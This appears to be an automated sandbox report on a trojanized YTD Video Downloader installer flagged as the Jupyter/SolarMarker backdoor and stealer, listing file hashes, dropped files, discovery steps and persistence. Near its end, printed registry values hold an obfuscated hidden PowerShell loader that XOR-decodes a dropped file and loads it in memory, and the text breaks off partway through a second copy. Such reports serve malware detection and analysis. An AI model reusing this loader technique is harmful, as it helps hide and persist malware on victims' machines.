C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 702d280524639191b5886a8c17af647c
SHA1 9fbd69dc29a7b2d2f9e897a5d33db08c585db356
SHA256 14fac4de843aff5251788ae7663e09e49b7b8c72e978fe26c31eb378b05d4f8b
SHA512 dcbe3173a6a29663fac00ae45cfbb76dd353b80686b7d5502d420b17ce7172a8c7723113ecc0bb4cf77d7efb8b531376440fe69a722ab8898eef9722fc9c2684

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5dfab9f39983301be906486249374452
SHA1 1a8dbd165d8a9bc448b55d0b937087f5b60cda17
SHA256 ce58b28d7d93d6af5b1ad6efdf149f71578bada04c4e81402f3c40e74f9fb288
SHA512 118827ae41e45b2c75a7c75d0b6a7dbdd85a583e0c809fd31aa64c63a7f44ff1b830d3fd148f2b6193db074ce915231720e81fabe86f8d84916c6a9918c551b6

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\recaptcha__en[1].js

MD5 33aff52b82a1df246136e75500d93220
SHA1 4675754451af81f996eab925923c31ef5115a9f4
SHA256 b5e8ec5d4dcc080657deb2d004f65d974bf4ec9e9aa5d621e10749182fff8731
SHA512 2e1baae95052737bdb3613a6165589643516a1f4811d19c2f037d426265aa5adf3c70334c1106b1b0eef779244389f0d7c8c52b4cd55fce9bab2e4fcb0642720

memory/1904-1679-0x0000000074EA0000-0x0000000074EC4000-memory.dmp

memory/1904-1680-0x0000000071CA0000-0x0000000071EE5000-memory.dmp

memory/1904-1682-0x0000000074820000-0x0000000074834000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\spacer[1].htm

MD5 4aa7a432bb447f094408f1bd6229c605
SHA1 1965c4952cc8c082a6307ed67061a57aab6632fa
SHA256 34ccdc351dc93dbf30a8630521968421091e3ed19c31a16e32c2eabb55c6a73a
SHA512 497ba6d8ec6bf2267fe6133a432f0e9ab12b982c06bb23e3de6e5a94d036509d2556ba822e3989d8cd7e240d9bae8096fc5be8a948e3e29fe29cab1fea1fe31c

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\ga[2].js

MD5 e9372f0ebbcf71f851e3d321ef2a8e5a
SHA1 2c7d19d1af7d97085c977d1b69dcb8b84483d87c
SHA256 1259ea99bd76596239bfd3102c679eb0a5052578dc526b0452f4d42f8bcdd45f
SHA512 c3a1c74ac968fc2fa366d9c25442162773db9af1289adfb165fc71e7750a7e62bd22f424f241730f3c2427afff8a540c214b3b97219a360a231d4875e6ddee6f

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\TVC4TVTK\www.google[1].xml

MD5 c54e105b286e6c004880eb2d05915472
SHA1 5975339866bc939b5002490a2a4555a95de56b8b
SHA256 5e2c575fcdc9fabf06695e416471c60003a37c7e11ed9acc3aa6f8aa59d19aa1
SHA512 14fb657a9b350e6648f2ad2a3bdf314332a06911c21350a6b66fe73c085f0e3c07edb452b1378e39c6a88b16f355c334a5dc6dba2bc5f8a111820c18e718681b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\styles__ltr[1].css

MD5 0ca290f7801b0434cfe66a0f300a324c
SHA1 0891b431e5f2671a211ddd8f03acf1d07792f076
SHA256 0c613dc5f9e10dff735c7a102433381c97b89c4a26ce26c78d9ffad1adddc528
SHA512 af70c75f30b08d731042c45091681b55e398ea6e6d96189bc9935ce25584a57240c678ff44c0c0428f93bf1f6a504e0558bc63f233d66d1b9a5b477ba1ef1533

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\TVC4TVTK\www.google[1].xml

MD5 7a8719fb43f3eca706375b4d35ad5393
SHA1 a51d4ce8a7889c32f91f5aa227a37e1b003e30b3
SHA256 6f0c607ba2f61466849afa1816b278b3cf7223e71abb564811c5da9ae923ebd4
SHA512 bc8f036a0d1938bd9ae05c5c64ac76c075b5a91544776578670a1f4d0d4502c7d63b62254a7880d480be9e34980ceaf9f914894c93be68eb272c28e0e0027eb4

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D6V88JEY\nqindL10x-xAPrwNrAa_2xXCVxcRZYSWuE-W4fSi8Ko[1].js

MD5 d99939496f22d283c093dc7989278200
SHA1 5f637e9351b678dee8473c56b464c8184dce59b4
SHA256 9ea8a774bd74c7ec403ebc0dac06bfdb15c2571711658496b84f96e1f4a2f0aa
SHA512 5bbcb7d40ab59d5f12d16a523c3f713f82d702dd61b4cbd485f80052317943857a03ee8071618a42d498733ae7c59ce9f5044540acbde7d5fdd2e12af0a4cfd6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 04e542987b61a2093b2bf7ec220f8dfc
SHA1 67caf9f64679ad3e05be605b77b2a1eca0bde9d5
SHA256 89fe7f99d2a98acf86344ba6663e6c237c4969fda210be89733b594d4798f951
SHA512 3452d4decb6a9b175a31fe27db895170e72fe2ed943220c9c6a2ca814fe357c522969646df0d27ccfe29d0d3673747e9ea178ff6f0e130f64ccd2c6cab2f088e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 d8b973f5f6f30aeed55ce75e8da739ba
SHA1 2b9bc19e2812ef3f955b23f1a86d2b4b8d10f9ec
SHA256 740fdaea6e73edf61251e13deffaa5eed5f30818e6873085eb0b6a3fa63ea707
SHA512 db43111015e045363c3f6863dfdffa489caea8de282757466af85196e4cb965da93aa6d46a63bd4d499f870a8fdf0b85cbc1f563129107ad266939084b3ba1be

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 083165366adc1e40f6da16f5646fb650
SHA1 ec6222bba9830abcd9bb54a9954c3ea75d4b29b1
SHA256 3ffd84e58322292bcd1ccded425e676b1a8bc0a5201567c2438aeade3cb9289f
SHA512 cb4a9189d64b7f2b276a2db0b2016665b6a680fbe7be4aaab76d8282bd301e6415408f238c2af0d7fc78a40d6c358509e53b387ed4031fc2f3826f358fbe654e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 633cc74ad08fac5b5d906cdd8079e5f2
SHA1 b0b7b3b197ea0310a8d3c24ffd256366c5883408
SHA256 ae50a3439f0dfd284a7b27f5c69318daf54e59e183dc28a695c0391fa782f58a
SHA512 735dbc4b9ec888ee6b5754db9082fea7a478eede339bea1920c77e5f8436162948e78d8c70c7a101496709434b308db6e2a7c7feeadaf610f82112b636eaad25

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e434efa0c8909c949ad52044c28ac342
SHA1 edbc8487c33d8d5fa26c72922f28615ba0f80b63
SHA256 6ee6ca2221257d9497afbc293bd122c42e3a0fa3b740045f0c4ad836abf9309d
SHA512 ebf13d459379bb6f9387344e0d30265efa46d034137dcd1680e625851403ac17d1298f94e9ebc7faa2458ccabd37523bf3b4cf152539d175fc04b5d6c9fe29b6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9e78fe126574c70482e1565f4620f6b5
SHA1 1cf4133e2d8332b3d9c8ca31dad3f26ced8b1d0a
SHA256 aa2cbd494b9772431bcb93d50baab99d0fbe6cf1d09162491df5c1f247da8e35
SHA512 01f82f552a9f8f35fc53cc0931f00d83540fa990afe43bc434aec6873d3fe24e9ac5d16505f439b3cbf1f37c0eb1c8b0e20b31cf79158caf177decaa32f818c1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d21d982902a4c301beb28393066348a6
SHA1 a904efdb806630fd9fe974e27fa689b5de4df62c
SHA256 228807ada6e6c08e42f6ed38b5576ac6e07b89b0649980bca7f13d2aa0b761b3
SHA512 59a0b0e9e59dcfd0fdf1f5a5d206a198c43d729988dfabe0523ddd0bf50ae6f58c1d3c6b70ef3006d30d8f281d6800c32780ca4179ff52a2b22f3b54ceeeb154

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8775ad2c9d54368dbba3fd6ef90871af
SHA1 21952b663343053969a9bc6c04ef4b5938d2fba2
SHA256 82b2b856b037bef0aa3f4b0b6c312caab7e5d37f1eb4e312548cc7cbc1b82fb3
SHA512 1d06858fd41bfa98430f41f5bb4340e2c3491e13a49a7f5111693ad2c6dbc7edecad019e39e589422ecd3fa827c664a14c8abe7f8709c405742e0f63e79840e4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 3349e84cbbd92ed821a789533cb83ed9
SHA1 e102b72dd82a264f8cef1ba46728caf1c6131fb3
SHA256 907a771c35db5663055274eb111814045a3c269decd725a57f5b1a5aadbdb4bb
SHA512 e91637992afe02d412b9b214593f850320fad8c08447ab5a71a18b338ffcb1c2856c7e6c5b67e25382fda22a6c47f7fec6d99754c7b529e71e5f7116b6d43bb9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 93fe43789ee91cc07623d643fad97255
SHA1 b140ff26d1cc28ad99c0f8ec5a399daf81d36abe
SHA256 01b4dbda548d54378035a0f7899ded2e4ce1ab7585c89635f4a88deb36a9cbb0
SHA512 ba8c6c46e14c496778f7b60c65ce9350b244a2413a6b69acb31ddfa764456ec3dbe78efe8161d02317b102de02fd56383055f84ebffd4d9ba1b12b0226fac848

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6def2c074cb45dfa167b8bd4dcc53ab2
SHA1 a2b3469ba89814ee0d3581374e28bc3e7b8b53b5
SHA256 8c4236349f96494ecf39e2be7717a7aeead2f2222d9967365b96444f99e87cd6
SHA512 d1c645e724023ef5457cccc77c02c5b3b27d33f917174a140cddad913880520bc435e50d05d4962e190e1c59eeade1f6e14c156703bc4009a370206e106afd1c

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-03 05:18

Reported

2024-10-03 05:21

Platform

win10v2004-20240802-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

Signatures

Jupyter Backdoor/Client payload

Description Indicator Process Target
N/A N/A N/A N/A

Jupyter, SolarMarker

backdoor trojan stealer jupyter

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Checks installed software on the system

discovery

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1035.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1051.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1038.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\scripts.yds C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\access\libfilesystem_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdrawable_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1036.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libugly_resampler_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\codec\libavcodec_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1060.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res9999.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libvmem_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1026.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1048.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1052.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1055.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2070.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2074.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv2 C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1040.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libinteger_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlccore.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdirect3d_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libwingdi_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1025.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1043.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\plugins.dat.4584 C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.Apachev2 C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libaudio_format_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_output\libdirectsound_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1049.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\librtmp.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_filter\libswscale_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1030.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1033.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1045.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlc.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1044.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1050.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\FFMPEG.EXE C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1031.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1032.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1059.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\manual.bat C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libfloat_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1029.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1061.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv3 C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\LICENSE C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1053.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1034.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2052.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ndhqnowpzdefglqlbh\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\gayhiusqkilpcm\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\WZkcTmGBguVCNYhSan\\ZCphNMuniDyXoBgVL.GstAbjlkvRZ');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT $ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.ojotbsynykdq C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\txlgibmptcbgefnzkow\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.njekblnzhwlihimv\ = "txlgibmptcbgefnzkow" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\qlbwvenckwghjycymhz C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\qlbwvenckwghjycymhz\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\zpinfxlegqavb\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\zpinfxlegqavb\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\RmDloHBSkgfJqnhI\\VzsJqGlBmaubx.ihjtUTNvzCR');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT 